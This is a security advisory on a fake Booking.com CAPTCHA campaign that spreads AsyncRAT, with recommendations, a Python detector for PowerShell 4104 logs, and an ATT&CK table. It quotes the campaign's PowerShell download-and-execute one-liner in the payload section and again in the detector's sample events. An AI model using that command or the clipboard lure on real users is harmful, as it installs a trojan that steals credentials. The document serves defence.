A recent malware campaign uncovered by Malwarebytes involves users being redirected from gaming platforms and social media to fake Booking.com clones, ultimately leading to infection with AsyncRAT – a potent Remote Access Trojan. These malicious redirection links are embedded in ads and deceptive CAPTCHA forms, exploiting user trust to trick victims into executing PowerShell commands that download and install the malware.
Severity Level: High
Threat Details
1. Attack Vector:
- Victims are lured through sponsored ads, gaming sites, and social media posts.
- Redirected to fake Booking[.]com clones.
- Presented with a CAPTCHA prompt.
- Clicking the CAPTCHA causes a malicious PowerShell command to be copied to the clipboard.
- Instructions prompt victims to paste the command into the Windows Run dialog, triggering malware installation.
2. Payload Execution:
powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet[.]com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
This downloads ckjg.exe, which in turn installs Stub.exe.
3. Malware Functionality – AsyncRAT:
- Remote desktop and keylogging
- Credential theft
- File execution and exfiltration
- Persistence and evasion
Recommendations:
- Use an active anti-malware solution that blocks malicious websites and scripts.
- Use a browser extension that blocks malicious domains and scams.
- Disable JavaScript by default in untrusted contexts to prevent clipboard hijacks via document.execCommand('copy').
- Enforce policies via Group Policy to disable or restrict powershell.exe and pwsh.exe for standard users.
- Educate users on:
  - Recognizing fake CAPTCHA prompts that ask for system-level actions.
  - The risks of copying/pasting commands from unknown websites.
  - Red flags in travel booking scenarios (e.g., unusual domains, poor design, unexpected redirects).
- Use application allowlisting (e.g., Microsoft AppLocker or WDAC) to prevent execution of unauthorized EXEs like Stub.exe.
- Restrict access to the Windows Run dialog for standard users.
- Enable PowerShell script block logging (Event ID 4104) and monitor it for use of Invoke-RestMethod, Invoke-Expression, or obfuscated strings.
- Block the IOCs at their respective controls (full IOC list in the VirusTotal collection below):
https://www.virustotal.com/gui/collection/6ffdf218e2d97b362919744b90ab6651a2029969ace685585774616cf452a3ee/iocs
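The script block logging recommendation above is easiest to act on with a concrete triage rule. The following Python snippet is an added example, not code from the advisory or from Malwarebytes; it assumes Event ID 4104 records have already been exported from the Microsoft-Windows-PowerShell/Operational log as (record id, event id, ScriptBlockText) tuples, and the sample events it carries are constructed rather than captured telemetry. It scores each block on the combination the advisory describes (a download cmdlet feeding Invoke-Expression, hidden or no-profile launch flags, long base64 runs) and flags only blocks that cross a threshold, so a lone Invoke-WebRequest used by an admin script is not reported.

```python
"""Triage PowerShell Event ID 4104 script blocks for the fake-CAPTCHA
download-and-execute chain described in the advisory.

Added example, not part of the advisory. Assumption: events were exported
from Microsoft-Windows-PowerShell/Operational as (record_id, event_id,
script_text) tuples; SAMPLE_EVENTS below is constructed, not real telemetry.
"""
import re
from dataclasses import dataclass

# Cmdlets and aliases that fetch remote content.
DOWNLOAD_CMDLETS = re.compile(
    r"\b(Invoke-RestMethod|Invoke-WebRequest|irm|iwr|DownloadString)\b", re.I)
# Cmdlets that execute a string as code.
EXEC_CMDLETS = re.compile(r"\b(Invoke-Expression|iex)\b", re.I)
# Launch flags that hide the window or skip the profile.
HIDDEN_FLAGS = re.compile(r"-(WindowStyle\s+Hidden|NoProfile|w\s+hidden|nop)\b", re.I)
# A long base64 run is a cheap proxy for "obfuscated strings".
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")


@dataclass
class Finding:
    record_id: int
    score: int
    reasons: list


def score_script_block(text):
    """Return (score, reasons) for one ScriptBlockText value."""
    reasons = []
    if DOWNLOAD_CMDLETS.search(text):
        reasons.append("download cmdlet")
    if EXEC_CMDLETS.search(text):
        reasons.append("Invoke-Expression")
    if HIDDEN_FLAGS.search(text):
        reasons.append("hidden/no-profile launch")
    if BASE64_BLOB.search(text):
        reasons.append("long base64 string")
    score = len(reasons)
    # Download + execute in a single block is the defining chain: weight it.
    if "download cmdlet" in reasons and "Invoke-Expression" in reasons:
        score += 2
    return score, reasons


def triage(events, threshold=3):
    """Return Findings for 4104 events whose score reaches the threshold."""
    findings = []
    for record_id, event_id, text in events:
        if event_id != 4104:          # only script block logging records
            continue
        score, reasons = score_script_block(text)
        if score >= threshold:
            findings.append(Finding(record_id, score, reasons))
    return findings


# Constructed sample events (not real telemetry). Record 2 mirrors the shape
# of the command quoted in the advisory, with the domain left defanged.
SAMPLE_EVENTS = [
    (1, 4104, "Get-ChildItem C:\\Users | Measure-Object"),
    (2, 4104, "$banp = 'bkngnet[.]com'; $rkv = Invoke-RestMethod -Uri $banp; "
              "Invoke-Expression $rkv"),
    (3, 4103, "Invoke-Expression 'Get-Date'"),  # pipeline log, not 4104: skipped
    (4, 4104, "Invoke-WebRequest -Uri https://example.invalid/u.ps1 -OutFile u.ps1"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"record {f.record_id}: score {f.score} ({', '.join(f.reasons)})")
```

Only record 2 is reported: it pairs a download cmdlet with Invoke-Expression and so scores 4, while the plain Invoke-WebRequest in record 4 scores 1. Tune the threshold and the regexes to the environment; the point is that the download-plus-execute pairing, not either cmdlet alone, is the signal worth alerting on.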
MITRE ATT&CK
| Tactic | Technique | ID |
| --- | --- | --- |
| Initial Access | Drive-by Compromise | T1189 |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
| Execution | User Execution: Malicious Link | T1204.001 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Defense Evasion | Masquerading | T1036 |
| Command and Control (C2) | Application Layer Protocol: Web Protocols | T1071.001 |
| Command and Control (C2) | Remote Access Software | T1219 |
| Credential Access | Input Capture: Keylogging | T1056.001 |
| Collection | Clipboard Data | T1115 |
Source:
- https://www.malwarebytes.com/blog/news/2025/06/victims-risk-asyncrat-infection-after-being-redirected-to-fake-booking-sites